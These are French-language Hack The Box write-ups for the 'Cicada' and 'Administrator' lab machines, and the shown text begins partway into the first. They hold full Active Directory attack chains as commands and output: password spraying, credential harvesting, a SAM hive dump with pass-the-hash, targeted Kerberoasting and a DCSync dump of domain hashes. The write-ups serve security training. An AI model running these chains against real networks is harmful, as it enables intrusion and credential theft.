18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 $ nxc smb 10.10.11.35 -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; -d \u0026#39;cicada.htb\u0026#39; --rid-brute SMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\guest: SMB 10.10.11.35 445 CICADA-DC 498: CICADA\\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 500: CICADA\\Administrator (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 501: CICADA\\Guest (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 502: CICADA\\krbtgt (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 512: CICADA\\Domain Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 513: CICADA\\Domain Users (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 514: CICADA\\Domain Guests (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 515: CICADA\\Domain Computers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 516: CICADA\\Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 517: CICADA\\Cert Publishers (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 518: CICADA\\Schema Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 519: CICADA\\Enterprise Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 520: CICADA\\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 521: CICADA\\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 522: CICADA\\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 525: CICADA\\Protected Users (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 526: CICADA\\Key Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 527: CICADA\\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 553: CICADA\\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 571: CICADA\\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 572: CICADA\\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\\CICADA-DC$ (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\\DnsAdmins (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\\Groups (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\\john.smoulder (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\\sarah.dantelia (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\\michael.wrightson (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\\david.orelious (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\\Dev Support (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\\emily.oscars (SidTypeUser) On a donc une liste d\u0026rsquo;utilisateur probable:\n1 2 3 4 5 john.smoulder sarah.dantelia michael.wrightson david.orelious emily.oscars 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ nxc smb 10.10.11.35 -u users.txt -p \u0026#39;Cicada$M6Corpb*@Lp#nZp!8\u0026#39; -d \u0026#39;cicada.htb\u0026#39; --users SMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 SMB 10.10.11.35 445 CICADA-DC [*] Trying to dump local users with SAMRPC protocol SMB 10.10.11.35 445 CICADA-DC [+] Enumerated domain user(s) SMB 10.10.11.35 445 CICADA-DC cicada.htb\\Administrator Built-in account for administering the computer/domain SMB 10.10.11.35 445 CICADA-DC cicada.htb\\Guest Built-in account for guest access to the computer/domain SMB 10.10.11.35 445 CICADA-DC cicada.htb\\krbtgt Key Distribution Center Service Account SMB 10.10.11.35 445 CICADA-DC cicada.htb\\john.smoulder SMB 10.10.11.35 445 CICADA-DC cicada.htb\\sarah.dantelia SMB 10.10.11.35 445 CICADA-DC cicada.htb\\michael.wrightson SMB 10.10.11.35 445 CICADA-DC cicada.htb\\david.orelious Just in case I forget my password is aRt$Lp#7t*VQ!3 SMB 10.10.11.35 445 CICADA-DC cicada.htb\\emily.oscars On obtient un nouvel utilisateur ce qui nous donne deux comptes:\nmichael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 david.orelious:aRt$Lp#7t*VQ!3\nSMB DEV share : david On observe que david.orelious a un acces au SMB DEV:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 nxc smb 10.10.11.35 -u \u0026#39;david.orelious\u0026#39; -p \u0026#39;aRt$Lp#7t*VQ!3\u0026#39; -d \u0026#39;cicada.htb\u0026#39; --shares SMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\david.orelious:aRt$Lp#7t*VQ!3 SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV READ SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share 1 2 3 4 5 6 7 8 9 10 11 $ smbclient //10.10.11.35/DEV -U \u0026#39;david.orelious\u0026#39; Password for [WORKGROUP\\david.orelious]: Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; ls . D 0 Thu Mar 14 08:31:39 2024 .. D 0 Thu Mar 14 08:21:29 2024 Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024 4168447 blocks of size 4096. 403603 blocks available smb: \\\u0026gt; get Backup_script.ps1 getting file \\Backup_script.ps1 of size 601 as Backup_script.ps1 (3.1 KiloBytes/sec) (average 3.1 KiloBytes/sec) On a obtenu un script dans dev avec le mot de passe de emily.oscars en clair :\n1 2 3 4 5 6 7 8 9 10 11 12 13 $ cat Backup_script.ps1 $sourceDirectory = \u0026#34;C:\\smb\u0026#34; $destinationDirectory = \u0026#34;D:\\Backup\u0026#34; $username = \u0026#34;emily.oscars\u0026#34; $password = ConvertTo-SecureString \u0026#34;Q!3@Lp#M6b*7t*Vt\u0026#34; -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format \u0026#34;yyyyMMdd_HHmmss\u0026#34; $backupFileName = \u0026#34;smb_backup_$dateStamp.zip\u0026#34; $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host \u0026#34;Backup completed successfully. Backup file saved to: $backupFilePath\u0026#34; Compte utilisateur: emily.oscars:Q!3@Lp#M6b*7t*Vt\nSMB ADMIN ACCESS / Evil-winrm (user flag) On observe que emily a des droits intéressants sur les shares SMB ADMIN$ et C$ :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 $ nxc smb 10.10.11.35 -u emily.oscars -p \u0026#39;Q!3@Lp#M6b*7t*Vt\u0026#39; -d \u0026#39;cicada.htb\u0026#39; --shares SMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\emily.oscars:Q!3@Lp#M6b*7t*Vt SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ READ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ READ,WRITE Default share SMB 10.10.11.35 445 CICADA-DC DEV SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share $ smbclient //10.10.11.35/ADMIN$ -U \u0026#39;emily.oscars%Q!3@Lp#M6b*7t*Vt\u0026#39; ##OR sudo apt install cifs-utils -y sudo mount -t cifs //10.10.11.35/ADMIN$ /mnt/smb -o username=\u0026#39;emily.oscars\u0026#39;,password=\u0026#39;Q!3@Lp#M6b*7t*Vt\u0026#39; $ evil-winrm -i 10.10.11.35 -u emily.oscars -p \u0026#39;Q!3@Lp#M6b*7t*Vt\u0026#39; $ cd Desktop $ cat user.txt 5297.....2a75 Privilege Escalation Enumeration with emily.oscars 1 2 3 4 5 6 7 8 9 10 11 12 *Evil-WinRM* PS C:\\Users\\emily.oscars.CICADA\\Documents\u0026gt; whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled Exploit SeBackupPrivilege 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 $ reg save hklm\\sam . $ reg save hklm\\system . $ pypykatz registry --sam sam.hive system.hive WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work ============== SYSTEM hive secrets ============== CurrentControlSet: ControlSet001 Boot Key: 3c2b033757a49110a9ee680b46e8d620 ============== SAM hive secrets ============== HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010 Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: $ evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\Administrator\\Documents\u0026gt; cd ../desktop *Evil-WinRM* PS C:\\Users\\Administrator\\desktop\u0026gt; cat root.txt e39c.....9300 ","date":"2024-12-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/cicada-htb/","title":"HTB | Cicada"},{"content":" Machine name OS IP Difficulty Administrator Windows 10.10.11.42 Medium Users 1 2 3 4 5 6 Olivia : ichliebedich alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur ethan : limpbizkit Administrator : 3dc553ce4b9fd20bd016e098d2d2fd2e Enumeration Threader 3000 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 ------------------------------------------------------------ Threader 3000 - Multi-threaded Port Scanner Version 1.0.7 A project by The Mayor ------------------------------------------------------------ Enter your target IP address or URL here: 10.10.11.42 ------------------------------------------------------------ Scanning target 10.10.11.42 Time started: 2024-11-27 14:54:16.528194 ------------------------------------------------------------ Port 21 is open Port 53 is open Port 139 is open Port 135 is open Port 88 is open Port 464 is open Port 445 is open Port 389 is open Port 593 is open Port 636 is open Port 3268 is open Port 3269 is open Port 5985 is open Port 9389 is open Port 47001 is open Port 49665 is open Port 49668 is open Port 49664 is open Port 49666 is open Port 49670 is open Port 53246 is open Port 53276 is open Port 53268 is open Port 53251 is open Port 53313 is open Port 63231 is open Port scan completed in 0:00:08.796993 ------------------------------------------------------------ Threader3000 recommends the following Nmap scan: ************************************************************ nmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42 ************************************************************ Would you like to run Nmap or quit to terminal? ------------------------------------------------------------ 1 = Run suggested Nmap scan 2 = Run another Threader3000 scan 3 = Exit to terminal ------------------------------------------------------------ Option Selection: 1 nmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42 Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-27 14:55 CET Nmap scan report for 10.10.11.42 Host is up (0.038s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 53/tcp closed domain 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-27 20:55:50Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp closed ldap 445/tcp closed microsoft-ds 464/tcp open kpasswd5? 593/tcp closed http-rpc-epmap 636/tcp closed ldapssl 3268/tcp closed globalcatLDAP 3269/tcp closed globalcatLDAPssl 5985/tcp closed wsman 9389/tcp closed adws 47001/tcp closed winrm 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp closed unknown 49670/tcp closed unknown 53246/tcp closed unknown 53251/tcp closed unknown 53268/tcp closed unknown 53276/tcp closed unknown 53313/tcp closed unknown 63231/tcp closed unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_smb2-security-mode: SMB: Couldn\u0026#39;t find a NetBIOS name that works for the server. Sorry! |_smb2-time: ERROR: Script execution failed (use -d to debug) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 65.94 seconds ------------------------------------------------------------ Combined scan completed in 0:02:32.888755 nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 nmap 10.10.11.42 -sV -sC -T4 -Pn Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 18:52 EST Nmap scan report for administrator.htb (10.10.11.42) Host is up (0.072s latency). Not shown: 988 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-01 06:52:33Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2024-12-01T06:52:40 |_ start_date: N/A |_clock-skew: 7h00m02s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.37 seconds rpcclient enumusers 1 2 3 4 5 6 7 8 9 10 11 rpcclient -U Olivia%ichliebedich 10.10.11.42 -c \u0026#34;enumdomusers\u0026#34; user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[olivia] rid:[0x454] user:[michael] rid:[0x455] user:[benjamin] rid:[0x456] user:[emily] rid:[0x458] user:[ethan] rid:[0x459] user:[alexander] rid:[0xe11] user:[emma] rid:[0xe12] smbclient 1 2 3 4 5 6 7 8 9 10 11 12 smbclient -L //10.10.11.42 -U Olivia%ichliebedich Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.11.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available SharpHound 1 upload SharpHound.ps1 . Bloodhound On importe les données obtenu. Puis on voit que Olivia a des acces generic All sur Michael. On peut alors changer son mot de passe:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ## Olivia : Droits GenericAll sur l\u0026#39;utilisateur Michael Set-ADAccountPassword -Identity \u0026#34;Michael\u0026#34; -NewPassword (ConvertTo-SecureString -AsPlainText \u0026#34;azertyazerty\u0026#34; -Force) -Reset ## Connexion avec le compte de Michael evil-winrm -i 10.10.11.42 -u Michael -p azertyazerty ## Michael : Droits ForceChangePassword ## D\u0026#39;abord, il faut ajouter PowerView.ps1 pour obtenir certaines commandes dans ## le powershell de Evil-Winrm upload PowerView.ps1 ## On load powerview dans le powershell ## On met un \u0026#34;.\u0026#34; devant pour charger dans l\u0026#39;environnement powershell actuelle et pas dans un sous-environnement . .\\PowerView.ps1 ## Changement du mot de passe de Benjamin Set-DomainUserPassword -Identity Benjamin -AccountPassword (ConvertTo-SecureString \u0026#39;azertyazerty\u0026#39; -AsPlainText -Force) -Verbose ## Connexion avec l\u0026#39;utilisateur Benjamin evil-winrm -i 10.10.11.42 -u Benjamin -p azertyazerty ## RIEN ! smbclient ## FTP ftp 10.10.11.42 \u0026gt; get Backup.psafe3 Foothold Bruteforce Backup.psafe3 On bruteforce le password maitre du fichier Backup.psafe3 qui est un fichier password safe. Pour cela, on utilise hashcat:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 $ hashcat -m 5200 -a 0 Backup.psafe3 ~/wordlists/rockyou.txt hashcat (v6.2.5) starting OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ===================================================================================================================================== * Device #1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 6839/13742 MB (2048 MB allocatable), 8MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Single-Hash * Single-Salt * Slow-Hash-SIMD-LOOP Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 2 MB Dictionary cache hit: * Filename..: /home/leopold/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139922195 * Keyspace..: 14344385 Backup.psafe3:tekieromucho Session..........: hashcat Status...........: Cracked Hash.Mode........: 5200 (Password Safe v3) Hash.Target......: Backup.psafe3 Time.Started.....: Thu Nov 28 15:13:47 2024 (0 secs) Time.Estimated...: Thu Nov 28 15:13:47 2024 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/home/leopold/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 27754 H/s (5.85ms) @ Accel:64 Loops:1024 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 5120/14344385 (0.04%) Rejected.........: 0/5120 (0.00%) Restore.Point....: 4608/14344385 (0.03%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049 Candidate.Engine.: Device Generator Candidates.#1....: Liverpool -\u0026gt; babygrl Hardware.Mon.#1..: Temp: 60c Util: 22% Started: Thu Nov 28 15:13:27 2024 Stopped: Thu Nov 28 15:13:48 2024 PasswordSafe On installe pwsafe puis on ouvre la base de donnée avec le mot de passe trouvé tekieromucho.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 sudo apt isntall pwsafe pwsafe ./Backup.psafe3 alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur evil-winrm -i 10.10.11.42 -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb ./nxc smb 10.10.11.42 -u \u0026#39;emily\u0026#39; -p \u0026#39;UXLCI5iETUsIBoFVTj8yQFKoHjXmb\u0026#39; SMB 10.10.11.42 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) SMB 10.10.11.42 445 DC [+] administrator.htb\\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb evil-winrm -i 10.10.11.42 -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur User flag Finalement, on obtient le flag utilisateur grâce à Emily\n1 2 3 4 5 6 7 8 9 10 11 12 evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\emily\\Documents\u0026gt; cd ../Desktop *Evil-WinRM* PS C:\\Users\\emily\\Desktop\u0026gt; cat user.txt 3415.....de32 Privilege Escalation Emily -\u0026gt; Ethan On doit faire un kerberosting. D\u0026rsquo;après le write-up, il y avait une manière plus simple de le faire grace a ce repo github qui fait toutes les etapes qu\u0026rsquo;on a effectué à la main d\u0026rsquo;un coup:\ngit clone https://github.com/ShutdownRepo/targetedKerberoast\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ## Depuis Emily evilWinrm . .\\PowerView.ps1 Set-DomainObject -Identity Ethan -Set @{serviceprincipalname=\u0026#39;fakeService/targetHost\u0026#39;} ## Depuis Kali ┌──(kali㉿kali)-[~/Downloads] └─$ sudo ntpdate administrator.htb 2024-11-29 16:04:44.623613 (-0500) +25200.766571 +/- 0.493670 administrator.htb 10.10.11.42 s1 no-leap CLOCK: time stepped by 25200.766571 ┌──(kali㉿kali)-[~/Downloads] └─$ GetUserSPNs.py administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -request hashcat -m 13100 -a 0 ethan_hash.txt ~/wordlists/rockyou.txt --optimized-kernel-enable --show leopold@leopold-ZenBook-UX434FAC-UX434FA $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$78ac2707afa86369c7b7ac6481d4f104$90702b9d78c06a35af5186690e4534b9432409b6e97765e513071ac185c0547c06cb3a2bf9b7268791819e21671adc50267d2233c02f05a3528d9a3341a87a2f470a8b7cf56a3d326751f9def7e0ba074bc3898d2159339e52406c576ce48895c687ad7460ed922d25a7f311197ab8ba2dd2f407690371cea35ab9509f4323aef68705ff3a735d7a461691040e3f6cee60cf8872450c1915429bc741357983166310c5664995fbb6d2e94d555c8ecd59e01f951860d21da3adda55559976f5472be684af958d97e449d1359f5c21e24cd684a1b4db78ff6386b7b02dcecc7bec3bd3b073ac659d50f2e168563a99ff4e8a75460d653acc88eda530e4de755074de68faa776a437a45ce3a681e63edd36130040528f02bf655f8b2ef8fdac61d33c10c10573f4641551d55a950bc13ca30d4dbe622be89f6296f0d330352910d3df0d4c659408a422dbba104e64d3e061a9a182167250a3943ad22a24aceb2e7c51a2e76fc14125c88fb0990601a8f28b2ee96da6da4cf743800c7777e0549fa84d96504a8e250deeb266786714f9d3aa19fcb0f60cf60b788f6def223a11dfda0e0bbbbff61293d7c30925f7f743494f9950fd6684d6f60ab77494e726a75178cf7112b961665ea10213fbb40702faa66dcecd6c7be70738ee8d6e25bafc67962d7aa43cb4a36eb367ecffe26060cc38f411d26e41a3a37ea0d62e3be77d42daee37a277ac464d8b1e2b3d2b5587d2ef0bac76a15009361f4d5256be13b408617cf910a9faa14d1f7997fe85c51ee20f0977fd60381b815f0acff3cb3d4b6a1a6ff72f0d75d03190ed77c663cdd6cc2c11f87916456861d928554bc0cea4f2b05ea58afff209e19964ad6a5e69c2775a17645f61e39c24dd3b9705272580e72db2438ee10e26ce49cedcc6d40727d8d9eb839db1029fbe39d197208829689909afca82def5d5143bf5e80d7486bace7c1ce7364615030fe65555f03f8fc90791c3d3760feaa03e7e6c9b4654e80ccb1bc5803bb3735e17b3e025fccd1e510aff673cd9d17bb03d1ffd1a7ffaf60b730a619263ed6b67af39efff762026ef683e8b0d330c1f1da452383fab9acb9c652257b3400e2190f4603361cf61f7d187d15a71702bbc95eec7838de2ae64584e64d8ee59de45de529a913f473a52a312dd66b3645b1b0d001147ad744436b8cfdb72af6dc5defe880a6170c24ee592d53f3b8874678c202be3fdcc5b412b59b5800fcd25641bbb8e443f1b94f25c206a628ef448eb0d205b0cf7ec9c90374d53f20fff82be21a8002a6de850eeb67e16e0e6e0022ecaa54ef7ef46c0b0bf38d819c28863e1611d6112b08683ae1ac7c3cee339587b502e83369f27b7b445964fa6efb504fec49f0c5a319aa341273a50902ee8531e27b289afa18c617eaa5d806303d723045102267a39773e6da6e1e4949cf3fdcea35174107c6205feb621037c4dcb074a3b3684434ca2da040e93e981ad3f12e7bb106a9bc2824f5ac151556eaea4a97a972deb5da307d67938fe59:limpbizkit On obtient les creds de Ethan:limpbizkit\n1 2 3 4 5 6 7 8 9 rpcclient -U \u0026#34;administrator.htb\\ethan%limpbizkit\u0026#34; 10.10.11.42 ldapsearch -x -H ldap://10.10.11.42 -D \u0026#34;ethan@administrator.htb\u0026#34; -w \u0026#34;limpbizkit\u0026#34; -b \u0026#34;DC=administrator,DC=htb\u0026#34; ## Tentatives d\u0026#39;ouvertur d\u0026#39;un shell $ evil-winrm -i 10.10.11.42 -u ethan -p limpbizkit $ wmiexec.py \u0026#39;administrator.htb/ethan:limpbizkit@10.10.11.42\u0026#39; $ psexec.py \u0026#39;administrator.htb/ethan:limpbizkit@10.10.11.42\u0026#39; $ dcomexec.py \u0026#39;administrator.htb/ethan:limpbizkit@10.10.11.42\u0026#39; Secretsdump On récupère le hash de l\u0026rsquo;administrateur grâce au script secretsdump et aux droits de l\u0026rsquo;utilisateur ethan.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 secretsdump.py -just-dc ethan:limpbizkit@10.10.11.42 -outputfile dcsync_hashes Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6::: administrator.htb\\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7::: administrator.htb\\michael:1109:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: administrator.htb\\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b::: administrator.htb\\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31::: administrator.htb\\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884::: 